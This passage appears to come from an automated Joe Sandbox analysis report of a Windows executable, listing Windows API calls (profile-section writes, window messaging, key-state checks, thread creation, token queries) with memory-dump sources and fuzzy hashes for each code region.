                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 03984fd2b0d020ac0ffc9aee16b00165ce697b2c843dd3d688246c5296f48d5f
                                                                                                                  • Instruction ID: 5d70d11997d24e6ffaeaef325a319af00192bd3681dca415641e63499d43d7a2
                                                                                                                  • Opcode Fuzzy Hash: 03984fd2b0d020ac0ffc9aee16b00165ce697b2c843dd3d688246c5296f48d5f
                                                                                                                  • Instruction Fuzzy Hash: 9C41E435920206AFDB24DF68CC49FA9BB6AEB09320F1A5257E959E73D1C730ED01D670
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DC17D4
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00DC17FD
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DC183C
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DC1861
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DC1869
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1389676194-0
                                                                                                                  • Opcode ID: 11fbc8de40ab80edccab8aa42849f97baa7e1c3dad95081a00ba2be1bd00dbc0
                                                                                                                  • Instruction ID: 522b415c33a4c06d44f0f80e9f27ece5d950118881be7a08085d04999f2174ae
                                                                                                                  • Opcode Fuzzy Hash: 11fbc8de40ab80edccab8aa42849f97baa7e1c3dad95081a00ba2be1bd00dbc0
                                                                                                                  • Instruction Fuzzy Hash: 8D410A75A00205EFCB11EF64C985AADBBF5EF48314B14C099E809AB361DB71ED01DBB1
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4210589936-0
                                                                                                                  • Opcode ID: c042262adffab8beef256b138aed4bf7b4e1b7e933df5ece1fe5b24bc5b6871b
                                                                                                                  • Instruction ID: f2091502b74dfb4b582cedb693b7d4a1fb663e29df59133c671f39c109e87e99
                                                                                                                  • Opcode Fuzzy Hash: c042262adffab8beef256b138aed4bf7b4e1b7e933df5ece1fe5b24bc5b6871b
                                                                                                                  • Instruction Fuzzy Hash: D6416C31504759FBDF15AF69C884AEABBB5FB45724F14421AF829922A0C730AD50DFB0
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DAC156
                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00DAC200
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00DAC208
                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00DAC216
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00DAC21E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3382505437-0
                                                                                                                  • Opcode ID: 08412eb5ef6349b610c6b69abd8e42ae6c172f47eaea7d88202ece7f010a60d3
                                                                                                                  • Instruction ID: 6ea508bc10a36cb359fe3bed1a80d9100482fcb55dd57cf7af1551e415e85a81
                                                                                                                  • Opcode Fuzzy Hash: 08412eb5ef6349b610c6b69abd8e42ae6c172f47eaea7d88202ece7f010a60d3
                                                                                                                  • Instruction Fuzzy Hash: B331A071A0031DEBDF14CFA8DD4DAAE3BB6EB05325F104215F925EA2D1C7B09914DBA0
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00DAE9CD
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DAE9EA
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DAEA22
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DAEA48
                                                                                                                  • _wcsstr.LIBCMT ref: 00DAEA52
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902887630-0
                                                                                                                  • Opcode ID: 295d79e92f2ab049d21a25c4951cd4fc3e07c6cf02ef60811861b1ba5b64a496
                                                                                                                  • Instruction ID: 64f1b33e92ae37aae70d6e74718d87558caf9e12ab67628dc0ea5738d0aceaab
                                                                                                                  • Opcode Fuzzy Hash: 295d79e92f2ab049d21a25c4951cd4fc3e07c6cf02ef60811861b1ba5b64a496
                                                                                                                  • Instruction Fuzzy Hash: 69210472204314BAEB159B29AC49E7F7FA9EF46750F148029F809DA191EB60DC40D6B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DDDCC0
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DDDCE4
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DDDCFC
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00DDDD24
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00DC407D,00000000), ref: 00DDDD42
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2294984445-0
                                                                                                                  • Opcode ID: 75d37e2931e63d55672c5c60e36b4526820ef94f148e0eb6d15e9a19815918b4
                                                                                                                  • Instruction ID: 094722262b9e05d9eb1f393f30a686e8c84752f17b20de2d778479ce0ea8ce37
                                                                                                                  • Opcode Fuzzy Hash: 75d37e2931e63d55672c5c60e36b4526820ef94f148e0eb6d15e9a19815918b4
                                                                                                                  • Instruction Fuzzy Hash: FD21AE71610315AFCF205F798C48B693BABFB45365F144726F926D63E0D7709810CBA0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DACA86
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DACAB8
                                                                                                                  • __itow.LIBCMT ref: 00DACAD0
                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DACAF6
                                                                                                                  • __itow.LIBCMT ref: 00DACB07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2983881199-0
                                                                                                                  • Opcode ID: be9f692dba82e14aee5d2e3ab921f508ffdce41327fb507f97ce985bc656aa72
                                                                                                                  • Instruction ID: 115bee9bfa06ca7a675619b1064484e910ba185acefd7138c25aa293840a2709
                                                                                                                  • Opcode Fuzzy Hash: be9f692dba82e14aee5d2e3ab921f508ffdce41327fb507f97ce985bc656aa72
                                                                                                                  • Instruction Fuzzy Hash: 0D21DB767003187BDB21EA648C47FEE7AA9DF5A720F006024F905E7281E675CD4587B1
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DC89CE
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DC89E5
                                                                                                                  • GetDC.USER32(00000000), ref: 00DC8A21
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00DC8A2D
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00DC8A68
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4156661090-0
                                                                                                                  • Opcode ID: 6ff047e07d43057f8d38f43e0aaa516a2b67ccf41c70809a1de61e4c33d49e6d
                                                                                                                  • Instruction ID: ff2d2ac7ab62254d0adecb13f997138c120ccb8ba2b01cee54721e3f2a098a76
                                                                                                                  • Opcode Fuzzy Hash: 6ff047e07d43057f8d38f43e0aaa516a2b67ccf41c70809a1de61e4c33d49e6d
                                                                                                                  • Instruction Fuzzy Hash: 06214F75A00204AFDB10EF65C889EAA7BF6EF49311B04C479E94AD7351DA70AD40DB70
                                                                                                                  APIs
                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                  • BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225163088-0
                                                                                                                  • Opcode ID: 5e656e735b472cf61243dc8a63f335d1e6f5620255be8f3bfa57d26de729a845
                                                                                                                  • Instruction ID: c38c0506fcba649267bfb709e95e4888912944d8fbced6293df939b81c3b0ef5
                                                                                                                  • Opcode Fuzzy Hash: 5e656e735b472cf61243dc8a63f335d1e6f5620255be8f3bfa57d26de729a845
                                                                                                                  • Instruction Fuzzy Hash: 5C214C70800349EFDB14AF16EC4DBA9BFEAFB10325F18419BE455A61A0D7709899CB68
                                                                                                                  APIs
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D92E81
                                                                                                                  • CreateThread.KERNEL32(?,?,00D92FB7,00000000,?,?), ref: 00D92EC5
                                                                                                                  • GetLastError.KERNEL32 ref: 00D92ECF
                                                                                                                  • _free.LIBCMT ref: 00D92ED8
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D92EE3
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2664167353-0
                                                                                                                  • Opcode ID: 691bf76f517a9e5a10ce091ac1939435355d23db4e239850e6b995133b70c598
                                                                                                                  • Instruction ID: b49f05f9908c315c4c878d1bbd4da10a6632c7891e38847865e872f8fa813151
                                                                                                                  • Opcode Fuzzy Hash: 691bf76f517a9e5a10ce091ac1939435355d23db4e239850e6b995133b70c598
                                                                                                                  • Instruction Fuzzy Hash: 9F11C432104706BFDF20AFA5AC81DBB7BA9EF45B70B140529FA18C6191EB31D80097B4
                                                                                                                  APIs
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                  • GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 883493501-0
                                                                                                                  • Opcode ID: 1466ef9bd94071e40e727b987fadd86a3107412bbe7e33abc91660dd01f173b4
                                                                                                                  • Instruction ID: decdbebc3e28e4ad2ef68d49bd41ac0247b40c8a114e1a3efc198e28e6c4a5fe
                                                                                                                  • Opcode Fuzzy Hash: 1466ef9bd94071e40e727b987fadd86a3107412bbe7e33abc91660dd01f173b4
                                                                                                                  • Instruction Fuzzy Hash: C1011971201308BFDB115FA5DC88D7B3BAEEF8A768B14442AFA45C2261DB719C41DA70
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB8371
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DB837F
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB8387
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DB8391
                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2833360925-0
                                                                                                                  • Opcode ID: 580ba0a31665ea28d8a4f1fa20cdf8f09d4966c830ec3e3068a5cec4c35474ab
                                                                                                                  • Instruction ID: 15c4262cbb0415859a7d6bfff13054780f020f5ddead4960e31c4b5e2a174cde
                                                                                                                  • Opcode Fuzzy Hash: 580ba0a31665ea28d8a4f1fa20cdf8f09d4966c830ec3e3068a5cec4c35474ab
                                                                                                                  • Instruction Fuzzy Hash: 68011735D04719DBCF00ABA5E948AEEBBBAFB08B01F044055E542F2250DF709554DBB1
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00DAA874
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DAA88F
                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00DAA89D
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00DAA8AD
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00DAA8B9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3897988419-0
                                                                                                                  • Opcode ID: bff810be4a5b94244dbca01ecb6f647583661f07fe40207705e0ea57845d8874
                                                                                                                  • Instruction ID: db278e838c2245d520f0615833786857351567e8eac760ef34358bc2e56517eb
                                                                                                                  • Opcode Fuzzy Hash: bff810be4a5b94244dbca01ecb6f647583661f07fe40207705e0ea57845d8874
                                                                                                                  • Instruction Fuzzy Hash: 8C018B76600204BFDB104F68DC88BAABBEEEF45391F198129F901D2210D778DD41DBB1
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DAB806
                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB810
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB81F
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DAB826
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB83C
                                                                                                                  Memory Dump Source
